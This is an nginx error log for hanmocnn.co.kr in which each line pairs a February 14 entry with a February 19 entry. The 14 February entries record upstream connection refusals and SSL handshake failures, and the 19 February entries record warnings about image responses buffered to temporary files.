2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 00:43:45 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/63/0000020637 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 00:45:36 [warn] 988#988: *104477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/63/0000020638 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 00:45:36 [warn] 988#988: *104477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/63/0000020639 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 00:46:33 [warn] 988#988: *104477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/64/0000020640 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:24:43 [warn] 989#989: *106071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/38/0000021384 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:24:43 [warn] 989#989: *106071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/38/0000021385 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:37:47 [warn] 989#989: *107628 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/12/0000022129 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 01:37:47 [warn] 989#989: *107628 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/13/0000022130 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 01:37:47 [warn] 989#989: *107628 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/13/0000022131 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 01:37:48 [warn] 989#989: *107628 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/13/0000022132 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 01:45:28 [warn] 989#989: *107645 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/13/0000022133 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:45:28 [warn] 989#989: *107645 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/13/0000022134 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:46:07 [warn] 989#989: *107645 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/13/0000022135 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:55:25 [warn] 989#989: *107746 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/13/0000022136 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:55:25 [warn] 989#989: *107746 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/13/0000022137 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 01:55:25 [warn] 989#989: *107746 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/13/0000022138 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 01:55:36 [warn] 989#989: *107746 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/13/0000022139 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 01:57:46 [warn] 989#989: *107775 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/14/0000022140 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 01:57:46 [warn] 989#989: *107775 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/14/0000022141 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:57:46 [warn] 989#989: *107775 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/14/0000022142 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 01:58:21 [warn] 989#989: *107775 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/14/0000022143 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 02:00:03 [warn] 987#987: *107804 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/14/0000022144 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 02:00:58 [warn] 987#987: *107804 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/14/0000022145 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 02:00:58 [warn] 987#987: *107804 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/14/0000022146 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 02:00:58 [warn] 987#987: *107804 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/14/0000022147 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 02:34:11 [warn] 987#987: *107845 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/14/0000022148 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 02:34:11 [warn] 987#987: *107845 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/14/0000022149 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:59:10 [error] 287#287: *132 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:34:11 [warn] 987#987: *107845 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/15/0000022150 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:59:10 [warn] 287#287: *132 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:34:11 [warn] 987#987: *107845 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/15/0000022151 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:59:10 [error] 287#287: *132 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:39:55 [warn] 987#987: *107860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/15/0000022152 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:59:10 [warn] 287#287: *132 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:39:55 [warn] 987#987: *107860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/15/0000022153 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:04:30 [error] 381#381: *368 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:41:34 [warn] 987#987: *107874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/15/0000022154 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:04:30 [warn] 381#381: *368 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:44:20 [warn] 987#987: *107889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/15/0000022155 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:04:30 [error] 381#381: *368 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:44:20 [warn] 987#987: *107889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/15/0000022156 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:04:30 [warn] 381#381: *368 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:44:20 [warn] 987#987: *107889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/15/0000022157 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:09:54 [error] 383#383: *377 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:46:16 [warn] 987#987: *107904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/15/0000022158 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:09:54 [warn] 383#383: *377 upstream server temporarily disabled while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:46:16 [warn] 987#987: *107904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/15/0000022159 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:09:54 [error] 383#383: *377 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:46:16 [warn] 987#987: *107904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/16/0000022160 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:09:54 [warn] 383#383: *377 upstream server temporarily disabled while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:47:48 [warn] 987#987: *107918 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/16/0000022161 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:45:26 [error] 506#506: *1033 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:47:48 [warn] 987#987: *107918 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/16/0000022162 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:45:26 [warn] 506#506: *1033 upstream server temporarily disabled while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:57:14 [warn] 991#991: *107953 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/16/0000022163 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
